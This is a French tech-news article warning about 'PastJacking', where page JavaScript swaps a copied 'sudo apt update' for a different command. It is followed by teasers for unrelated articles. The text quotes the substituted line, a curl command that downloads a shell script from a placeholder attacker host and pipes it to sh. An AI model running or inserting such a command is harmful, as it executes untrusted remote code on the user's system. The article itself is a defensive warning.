Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d'une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n'est pas sans risque. Loin de là.

copier-coller danger
Crédits : Pixabay

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d'être sans risque, notamment lorsqu'il s'agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n'est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d'une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c'est son nom, consiste à l'introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l'utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

À lire également : Windows 11 – Microsoft veut révolutionner le copier-coller sur Edge et Chrome

Un copier-coller peut faire de gros dégâts

En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s'exécute. Plus précisément, c'est un écouteur d'évènements Javascript qui capture l'évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C'est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d'une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.

Source : Bleeding Computer


Réagissez à cet article !

Demandez nos derniers articles !

Les écrans LG installent des logiciels espions et affichent des pubs McAfee sur les PC Windows

La connexion d’un écran LG à un PC Windows provoque l’installation de logiciels espions et publicitaires sans l’autorisation de l’utilisateur. Quand on achète un moniteur gaming haut de gamme d’une…

L’UE sanctionne AliExpress d’une amende de 550 millions d’euros pour vente de produits illégaux, dangereux et contrefaits

AliExpress écope d’une lourde amende en Europe pour plusieurs manquements importants concernant les produits vendus sur sa plateforme en ligne. Acheter un produit sur AliExpress, c’est un peu comme jouer…

Tapo P110 : -41% sur cette excellente prise connectée pendant les Soldes sur Amazon

Les Soldes d’été se terminent dans quelques jours. Alors ne passez pas à côté des dernières offres exceptionnelles. Sur Amazon, vous pouvez par exemple trouver une prise connectée de qualité…

Pas besoin de Steam Deck pour jouer à vos jeux PC où vous voulez, cette appli gratuite permet de les streamer en un clic

Certes, jouer sur PC accorde un certain nombre d’avantages, mais certainement pas celui du confort. N’importe qui préférera certainement jouer bien installé au fond de son canapé ou même de…

Tapo TC71 : la caméra de surveillance 2K est en soldes à moins de 20 €, vite !

Les vacances d’été, c’est super. Mais c’est aussi la période la plus risquée pour les cambriolages. Alors pour partir avec l’esprit tranquille, nous avons trouvé pour vous une super caméra…

Gboard : Google prépare enfin une option pour vous débarrasser du plus gros défaut de la correction automatique

Ces derniers temps, Google s’affaire à améliorer son clavier virtuel : Gboard. Si la firme teste enfin une option pour la saisie vocale réclamée depuis des années, elle prépare également une…

TikTok s’attaque aux deepfakes avec un outil qui détecte les vidéos utilisant notre visage

Pour lutter contre les deepfakes, TikTok met au point une fonctionnalité permettant aux utilisateurs de détecter les vidéos dans lesquelles apparaît leur visage. L’essor de l’IA a rendu la création…

La bande-annonce d’Avengers Doomsday est en ligne, qu’est-ce qu’on en retient ?

Disney a diffusé la première véritable bande-annonce d’Avengers Doomsday. Thor y tient une place de choix, tout comme les X-Men et les 4 Fantastiques. Après plusieurs teasers nous présentant des…

Windows 11 : la recherche de l’Explorateur de fichiers va devenir bien plus rapide

Microsoft se concentre sur les performances de Windows 11 depuis quelques mois. C’est au tour de la recherche de l’Explorateur de fichiers de devenir bien plus efficace. En début d’année,…

YouTube : le mode picture-in-picture est cassé, Google cherche une solution

Google a confirmé sur ses forums d’entraide qu’un bug frappe la version iOS de YouTube — bien que quelques utilisateurs Android soient également impactés. Ce dernier empêche l’activation du mode…